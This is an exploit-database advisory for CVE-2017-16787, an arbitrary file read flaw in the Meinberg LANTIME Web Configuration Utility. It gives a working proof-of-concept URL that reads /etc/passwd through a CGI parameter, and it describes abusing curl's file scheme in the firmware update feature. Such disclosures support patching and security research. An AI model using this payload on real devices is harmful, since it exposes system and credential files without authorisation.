Meinberg LANTIME Web Configuration Utility 6.16.008 - Arbitrary File Read Vulnerability

2017-12-14T00:00:00
ID 1337DAY-ID-29214
Type zdt
Reporter Jakub Palaczynski
Modified 2017-12-14T00:00:00

Description

Exploit for cgi platform in category web applications

                                        
                                            Title: Meinberg LANTIME Web Configuration Utility - Arbitrary File Read
Author: Jakub Palaczynski
CVE: CVE-2017-16787
 
 
Exploit tested on:
==================
 
Meinberg LANTIME Web Configuration Utility 6.16.008
 
 
Vulnerability affects:
======================
All LTOS6 firmware releases before 6.24.004
 
 
Vulnerability:
**************
 
Arbitrary File Read:
====================
 
It is possible to read arbitrary file on the system with root permissions
 
Proof of Concept:
First instance:
https://host/cgi-bin/mainv2?value=800&showntpclientipinfo=xxx&ntpclientcounterlogfile=/etc/passwd&lcs=xxx
Info-User user is able to read any file on the system with root permissions.
 
Second instance:
User with Admin-User access is able to read any file on the system via
firmware update functionality. Curl accepts "file" schema which actually
downloads file from the filesystem. Then it is possible to download
/upload/update file which contains content of requested file.

#  0day.today [2018-04-09]  #